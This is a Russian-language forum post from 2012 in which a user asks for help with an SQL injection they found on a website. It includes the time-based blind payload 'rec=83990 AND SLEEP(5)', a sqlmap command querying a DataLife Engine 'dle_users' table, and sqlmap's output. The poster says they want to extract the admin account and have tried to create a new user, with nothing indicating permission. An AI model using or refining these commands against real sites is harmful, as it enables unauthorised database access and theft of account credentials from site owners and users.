28.06.2012, 14:39
|
|
Познающий
Регистрация: 19.07.2010
Сообщений: 45
С нами:
8324246
Репутация:
0
|
|
Вопрос по склмап.
Нашел слепую иньекцию. sqlmap подтвердил что это иньекция, вытащил список бд и всех таблиц. Однако, когда попытался вытащить акк админа (из другой базы. имена взял из вывода склмапа) он что-то странно себя вел.
Иньекция:
Код:
---
Place: GET
Parameter: rec
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: rec=83990 AND SLEEP(5)
---
Пытаюсь получить хоть что-то из бд:
Код:
./sqlmap.py --url=адрес --sql-query="SELECT name FROM db_name.dle_users;"
Вывод:
Код:
[09:27:24] [WARNING] the SQL query provided does not return any output
[09:27:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
SELECT name FROM db_name.dle_users;: None
Любые попытки получить информация заканчиваются именно так.
Один раз был такой вывод:
Код:
SELECT user_id FROM db_name.dle_users; [4]:[*] B[*] [*] ![*] A
Что делать? Попытки создать нового пользователя тоже провалились..Я думаю если он увидел список таблиц, то значит права на чтение точно есть. Или я не прав? Тогда должна быть возможность сделать выборку. |
|
|